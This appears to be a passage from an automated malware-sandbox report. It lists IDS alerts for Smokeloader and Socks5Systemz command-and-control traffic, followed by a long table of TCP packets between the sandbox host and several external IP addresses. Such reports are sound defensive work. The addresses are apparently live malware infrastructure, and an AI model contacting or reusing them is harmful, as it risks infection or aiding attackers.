2024-09-21T14:50:21.651440+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49833	62.150.232.50	80	TCP
2024-09-21T14:50:22.443868+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49836	185.196.8.214	80	TCP
2024-09-21T14:50:22.851621+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49835	62.150.232.50	80	TCP
2024-09-21T14:50:23.262577+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49837	185.196.8.214	80	TCP
2024-09-21T14:50:24.030669+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49838	62.150.232.50	80	TCP
2024-09-21T14:50:24.104661+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49839	185.196.8.214	80	TCP
2024-09-21T14:50:24.935483+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49841	185.196.8.214	80	TCP
2024-09-21T14:50:25.382494+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49840	62.150.232.50	80	TCP
2024-09-21T14:50:25.745759+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49842	185.196.8.214	80	TCP
2024-09-21T14:50:26.600892+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49843	62.150.232.50	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 14:48:01.250539064 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:01.255647898 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:01.255755901 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:01.256000042 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:01.260792017 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:01.969233990 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:02.015203953 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:02.083039045 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:02.083092928 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:02.083364010 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:02.087970972 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:02.087987900 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:02.870733023 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:02.870954990 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:02.886481047 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:02.886511087 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:02.886863947 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:02.939930916 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:03.081717968 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:03.127408981 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:03.241672039 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:03.241842031 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:03.241915941 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:03.243212938 CEST	49707	443	192.168.2.9	173.231.16.77
Sep 21, 2024 14:48:03.243238926 CEST	443	49707	173.231.16.77	192.168.2.9
Sep 21, 2024 14:48:03.271784067 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.271825075 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.271903992 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.272471905 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.272484064 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.733964920 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.734160900 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.737788916 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.737807989 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.738092899 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.739408016 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.787411928 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.867693901 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.867820024 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.867913008 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.868197918 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.868197918 CEST	49708	443	192.168.2.9	34.117.59.81
Sep 21, 2024 14:48:03.868220091 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:03.868228912 CEST	443	49708	34.117.59.81	192.168.2.9
Sep 21, 2024 14:48:05.728488922 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:05.728488922 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:05.734404087 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:05.734419107 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:06.375173092 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:06.422209024 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:06.502520084 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:06.502520084 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:06.507457972 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:06.507518053 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:07.555862904 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:07.555888891 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:07.555906057 CEST	80	49706	41.216.188.190	192.168.2.9
Sep 21, 2024 14:48:07.556098938 CEST	49706	80	192.168.2.9	41.216.188.190
Sep 21, 2024 14:48:08.217829943 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.222894907 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.223028898 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.251439095 CEST	49710	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.254848957 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.255409956 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.255927086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:08.256241083 CEST	80	49710	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:08.256321907 CEST	49710	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.256375074 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:08.256469965 CEST	49710	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.259679079 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.259844065 CEST	49714	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.260380983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.260457993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.260570049 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.260730982 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:08.260797024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:08.260890961 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:08.261293888 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:08.261308908 CEST	80	49710	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:08.261364937 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:08.261471987 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:08.265459061 CEST	80	49714	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:08.265537977 CEST	49714	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.265649080 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.265752077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:08.266186953 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:08.266283989 CEST	49714	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.271064043 CEST	80	49714	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:08.477967024 CEST	49715	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.478048086 CEST	49716	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.482880116 CEST	80	49715	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.482913017 CEST	80	49716	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.483035088 CEST	49715	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.483056068 CEST	49716	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.483576059 CEST	49716	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.483577013 CEST	49715	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.488348007 CEST	80	49715	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.488420963 CEST	80	49716	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.841861010 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.842031002 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.842827082 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.847631931 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.851077080 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:08.851174116 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:08.851545095 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:08.856241941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:08.880968094 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.881082058 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.881385088 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:08.886136055 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:08.891916037 CEST	80	49714	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:08.892014980 CEST	49714	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.893218040 CEST	49714	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.893834114 CEST	49717	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.898348093 CEST	80	49714	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:08.898439884 CEST	49714	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.898653984 CEST	80	49717	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:08.898791075 CEST	49717	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.899231911 CEST	49717	80	192.168.2.9	185.166.143.48
Sep 21, 2024 14:48:08.904042959 CEST	80	49717	185.166.143.48	192.168.2.9
Sep 21, 2024 14:48:08.940534115 CEST	80	49710	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:08.940691948 CEST	49710	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.940802097 CEST	49710	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.942065954 CEST	49718	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.945699930 CEST	80	49710	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:08.946968079 CEST	80	49718	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:08.947089911 CEST	49718	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.947329998 CEST	49718	80	192.168.2.9	176.111.174.109
Sep 21, 2024 14:48:08.952455044 CEST	80	49718	176.111.174.109	192.168.2.9
Sep 21, 2024 14:48:08.963943958 CEST	80	49715	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.964018106 CEST	49715	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.964263916 CEST	80	49715	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.964325905 CEST	49715	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.964744091 CEST	49715	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.965235949 CEST	49719	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.967529058 CEST	80	49716	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.967585087 CEST	49716	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.967902899 CEST	80	49716	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.967933893 CEST	49716	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.967951059 CEST	49716	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.968236923 CEST	49720	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.969435930 CEST	80	49715	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.970066071 CEST	80	49719	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.970140934 CEST	49719	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.970448017 CEST	49719	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.972706079 CEST	80	49716	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.973048925 CEST	80	49720	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.973103046 CEST	49720	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.973561049 CEST	49720	80	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:08.975189924 CEST	80	49719	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:08.978322029 CEST	80	49720	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:09.021869898 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.021893024 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.021904945 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.021938086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.021987915 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.022017956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022030115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022038937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022063017 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.022080898 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.022149086 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022161007 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022171974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022195101 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.022223949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.022701979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022722006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.022747040 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.022763968 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.024888992 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.024954081 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.025619984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.026745081 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.026799917 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.030349970 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.065464020 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.065534115 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.065901041 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.070833921 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.084336996 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.084412098 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.085005045 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:09.085367918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.085426092 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.089854002 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:09.112951040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.112972021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.112986088 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.112998962 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.113018990 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.113058090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.113063097 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.113074064 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.113106012 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.113132954 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.113138914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.113152981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.113166094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.113193035 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.113221884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.114022970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114037991 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114051104 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114084959 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.114113092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114119053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.114126921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114137888 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114168882 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.114192963 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.114937067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114949942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114960909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.114989042 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.115015984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.115026951 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.115029097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.115041971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.115067005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.115082026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.115809917 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.115861893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.115864992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.115875006 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.115911007 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.115925074 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.203867912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.203881979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.203900099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.203912020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.203922987 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.203933954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.203941107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.203989029 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204030037 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204310894 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204322100 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204333067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204365015 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204390049 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204396009 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204407930 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204452991 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204488993 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204782963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204828024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204835892 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204847097 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204883099 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204902887 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.204965115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204976082 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.204986095 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205008984 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205040932 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205073118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205085993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205117941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205146074 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205703020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205750942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205756903 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205765963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205790997 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205810070 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205894947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205905914 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205916882 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205929995 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.205935001 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.205966949 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206001043 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206049919 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206101894 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206722021 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206732988 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206743956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206773996 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206808090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206842899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206854105 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206865072 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206876040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.206886053 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206919909 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.206998110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207040071 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.207556963 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207601070 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207612038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.207612991 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207644939 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.207669020 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.207751989 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207762957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207773924 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207784891 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207803011 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.207827091 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.207876921 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.207926989 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.208009958 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:09.208061934 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.208270073 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:09.208703041 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.208753109 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.208762884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.208765030 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.208796024 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.208815098 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:09.208827972 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.208841085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:09.209131002 CEST	49712	80	192.168.2.9	103.130.147.211
